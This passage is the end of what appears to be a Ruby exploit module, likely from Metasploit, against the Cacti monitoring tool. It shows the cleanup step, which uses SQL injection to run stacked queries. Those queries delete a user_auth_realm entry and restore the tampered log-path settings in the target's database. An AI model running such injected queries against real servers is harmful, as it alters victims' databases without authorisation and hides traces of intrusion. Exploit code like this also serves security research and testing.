user_auth_realm where realm_id=#{10000 + @ext_link_id}") end if @do_settings_cleanup print_status('Cleaning up the log path in `settings` table using SQLi') sqli.raw_run_sql(";delete from settings where name='path_cactilog' and value='#{@log_file_path}'") sqli.raw_run_sql(";update settings set name='path_cactilog' where name='#{@log_setting_name_bak}'") end end end </code></pre>